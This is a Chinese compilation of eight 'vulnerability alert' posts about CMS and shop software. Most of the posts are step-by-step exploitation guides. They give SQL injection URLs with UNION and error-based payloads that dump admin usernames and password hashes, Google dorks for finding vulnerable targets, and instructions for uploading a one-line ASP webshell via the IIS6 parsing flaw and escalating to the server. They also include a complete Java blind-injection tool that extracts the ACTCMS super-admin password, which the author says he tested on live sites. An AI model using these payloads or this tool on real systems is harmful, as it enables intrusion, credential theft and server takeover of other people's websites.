以下是小编收集整理的魔方网络摄影系统注入漏洞及利用漏洞预警,本文共8篇,希望对大家有所帮助。本文原稿由网友“脏话出警小分队”提供。
篇1:魔方网络摄影系统注入漏洞及利用漏洞预警
魔方网络摄影系统
注入点:/news.php?action=detail&id=[SQLi]
利用方法,第一步通过注入点获取管理员账号和密码,密码居然是明文的
第二步,后台地址为/admin.php,进去管理后台试图拿webshell
第三步,通过iis6解析漏洞,上传.asp;.jpg一句话木马
第四步, 直接连接一句话 -_,
篇2:魔方网络摄影系统注入漏洞及利用和修复
魔方网络摄影系统
注入点: /news.php?action=detail&id=[SQLi]
利用方法,第一步通过注入点获取管理员账号和密码,密码居然是明文的
第二步,后台地址为/admin.php,进去管理后台试图拿webshell
第三步,通过iis6解析漏洞,上传.asp;.jpg一句话木马
第四步,菜刀连接一句话木马
第五步,进一步提权,拿下服务器,。。
--------------------------------------------------------------------------------
应该是统一建站的 连mysql 密码都是明文 无语啊.... 估计见一个死一个 不是密码为空 就是明文getshell 有时间 看看有没有其他的包含漏洞cgi过滤 太恶心了
其实cgi 嘛你懂的像这个 /data/attachment/1.php;1.jpg
不一定有效
FastCGI Error
The FastCGI Handler was unable to process the request.
Error Details:
Could not find entry for “jpg” on site 236134254 in [Types] section.
Error Number: 1413 (0x80070585).
Error Description: ÎTD§Ë÷òy¡£
HTTP Error 500 - Server Error.
Internet Information Services (IIS)
提供修复方案:
过滤news.php页面参数输入,
修复iis6解析漏洞
篇3:华讯网络管理系统注入漏洞利用漏洞预警
华讯网络管理系统存在SQL注入,可获取管理员用户密码信息,
关键字:inurl:chk_case.asp
漏洞测试:
www.site.com/chk_case.asp?ID=673%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,userpassword,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41%20from%20admin
默认后台:
www.site.com/admin/
篇4:ACTCMS注入漏洞漏洞预警
一款ASP的CMS程序,用的人并不是太多。
GOOGLE一下关键字“Copyright @ www.actcms.com” ,不是太多。
今天看了一下代码。
基本上所有的参数全都被过滤掉了。。
不过投票那里出了点小问题。。
在/plus/vote/vote.asp页面。
代码如下:
ASP/Visual Basic代码
....
if request(“voted”).count=0 then
response.write “”
response.end
end if
for i=1 to request(“voted”).count
actcms.actexe(“Update vote_act set VoteNum=VoteNum+1 where id=”&request(“voted”)(i))
next
....
response.Redirect “index.asp?id=”&id&“”
id直接从request里面取的,不过因为前面是update ,再加上后面的response.redirect,利用起来比较麻烦。而且这是一个一般工具无法识别的注入点。因为无论我们构造什么语句在后面,它都会跳到index.asp页面。
唯一有变化的就是当我们构造的注入条件正确的时候,票数会增加。 手工利用起来相当的麻烦,试了现在的那些注入工具明小子,pangolin之类的也不能注入,所以我自己动手写了一个简单的程序 ,因为只会JAVA,所以就用JAVA写了。。写的比较粗糙。用的穷举法,这样写着比较方便。速度慢就慢吧。
代码如下:
Java代码
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.net.URLConnection;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
public class ActCmsGetPwd {
public static char[] arr = { '0', '1', '2', '3', '4', '5', '6', '7', '8',
'9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l',
'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y',
'z' };
public static String siteurl = “”;
public static int voteid = 1;
public static String charset = “”;
public static void main(String[] args) throws Exception {
if (args.length < 4) {
System.out
.println(“usage:java ActCmsGetPwd System.out.println(“siteurl:目标站点”); System.out.println(“voteid:投票id”); System.out .println(“totalVoteNum:当前的投票人数,请自行查看plus/vote/index.asp?id= System.out.println(“charset:目标站点所用的ACTCMS的字符集,请自行查看网页源代码”); System.out.println(“eg:java ActCmsGetPwd www.abc.com/ 1 15 gb2312”); return; } siteurl = args[0]; voteid = Integer.parseInt(args[1]); int preVoteNum = Integer.parseInt(args[2]); charset = args[3]; System.out.println(“Code by Ninty , QQ 3191864”); System.out.print(“password is :”); for (int i = 1; i <= 16; i++) { System.out.print(send(i, 0, preVoteNum)); preVoteNum++; } System.out.println(“\\nDone!”); } public static char send(int a, int b, int preVoteNum) throws Exception { String sql = “%20and%20(select%20top%201%20mid(password,” + a + “,1)%20from%20admin_act%20where%20supertf%20=1)%20=%20'” + arr[b] + “'”; URL u = new URL(siteurl + “/Plus/vote/vote.asp?dopost=send&id=”+voteid+“&ismore=0&voted=3” + sql); URLConnection conn = u.openConnection; BufferedReader reader = new BufferedReader(new InputStreamReader(conn .getInputStream(),charset)); String str = reader.readLine(); while (str != null) { if (str.indexOf(“ 投票人数:”) != -1) { break; } str = reader.readLine(); } reader.close(); if (!isRight(str, preVoteNum)) { return send(a, ++b, preVoteNum); } else { return arr[b]; } } public static boolean isRight(String str, int preVoteNum) { if (str == null) { System.out.println(“无法读取!”); System.exit(0); } Pattern pat = Pattern.compile(“人数:(\\\\d+)”); Matcher mat = pat.matcher(str); if (mat.find()) { int num = Integer.parseInt(mat.group(1)); if (num != preVoteNum) { return true; } } return false; } }
下面是已经编译好的 class文件,编译环境JDK6,
直接运行就好。
actcmsgetpwd.class
在网上找了几个站测试了一下,都可以得到超级管理员的密码,不过官网好像不存在这个漏洞。
篇5:fckeditor漏洞利用漏洞预警
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
可以自定义文件夹名称上传图片木马,利用路径解析漏洞,也可以直接上传ASP木马,
fckeditor漏洞利用漏洞预警
,
如果是ASPX的就将/asp/connector.asp后缀改为ASPX
Type=Image这个变量是我们自己定义的。比如:
fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp
篇6:mvmmall网店商城系统注入漏洞漏洞预警
mvmmall网店商城系统最新注入0day问题出在搜索search.php这个文件上,
代码如下:
require_once ‘include/common.inc.php’;
require_once ROOTPATH.’header.php’;
if($action!=’search’){
$search_key = ”;
if (isset($ps_search))
{ //省略一堆东西
$tag_ids = array; //在if里
//继续省略
while ($row = $db->fetch_array($result)) {
$tag_ids[] = $row['goods_id'];
} //也是在if里
}
//省略一堆东西
} //结束if里的东西
//商品标签搜索
$tag_ids = array_unique($tag_ids); //没有ps_search他就没初始化!可自行输入
$tag_search = implode(‘,’,dhtmlchars($tag_ids)); //dhtmlchars过滤HTML标签不用理会
$tag_search && $tag_search = “OR uid IN($tag_search)”; //呼…..成功了!
//省略无关东西
$search_sql = “WHERE upv = ’1′ AND up_date<=’$m_now_time’”.” AND (( 1 ” . $cat_search . $search_key . $brand_search . $min_search . $max_search .” ) “.$tag_search.” )”;//没有单引号的….
$total_count = $db->counter($mvm_goods_table,$search_sql);
用ADMIN的用户和MALL后用找回密码功能 mvm_lostpass存放验证串直接改密码了,
测试EXP:
www.dj4now.com/search.php?tag_ids[goods_id]=uid))%20and(select%201%20from(select%20count(*),concat((select%20(select%20user())%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23
BY:www.dj4now.com/
篇7:WordPress 3.1.3 注入漏洞漏洞预警
get_terms过滤器文件中声明taxonomy.php 没有正确验证用户输入,允许攻击者构建任意sql命令,可用于盲注,
以下网址可用于执行SQL盲注攻击
[SQL injection] sql注入
localhost/wp-admin/edit-tags.php?taxonomy=link_category&orderby=[SQL
injection]&order=[SQL injection]
localhost/wp-admin/edit-tags.php?taxonomy=post_tag&orderby=[SQL
injection]&order=[SQL injection]
localhost/wp-admin/edit-tags.php?taxonomy=category&orderby=[SQL
injection]&order=[SQL injection]
第二个:
get_bookmarks()函数中声明的
bookmark.php文件没有正确验证用户输入
这个也可以盲注
以下网址可用于执行SQL盲注攻击
localhost/wp-admin/link-manager.php?orderby=[SQLinjection]&order=[SQL injection]
WordPress已经确认漏洞存在了
漏洞解决:
升级到3.1.4 或者 3.2-RC3版本,
篇8:iGiveTest 2.1.0注入漏洞漏洞预警
Version: <= 2.1.0
# Homepage: iGiveTest.com/
谷歌关键字: “Powered by iGiveTest”
随便注册一个帐号,
iGiveTest 2.1.0注入漏洞漏洞预警
,
然后暴管理员帐号和密码
www.xxxx.com/users.php?action=groups&order=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
南方数据网站管理系统注入漏洞&后台拿WebShell漏洞预警
- PHP字符编码绕过漏洞总结漏洞预警2023-09-30
- 无补丁?教你阻击Office漏洞漏洞预警2023-06-27
- WebPageTest任意php文件上传漏洞预警2024-04-09
- 企业SEO专业网站漏洞及修复漏洞预警2025-01-26
- 正方高校教务管理系统漏洞修复漏洞预警2022-12-11
- 流行WordPress SEO插件曝高危SQL注入漏洞2023-01-17
- 网络高手抓漏洞“快速升级qq”2023-01-11
- 给个拿微尔程序的站的方法漏洞预警2023-09-13
- 快捷留言簿v10.09 正式版上传漏洞和Cookie欺骗漏洞漏洞预警2022-12-20
- PHP代码网站防范SQL注入漏洞攻击的建议WEB安全2023-06-19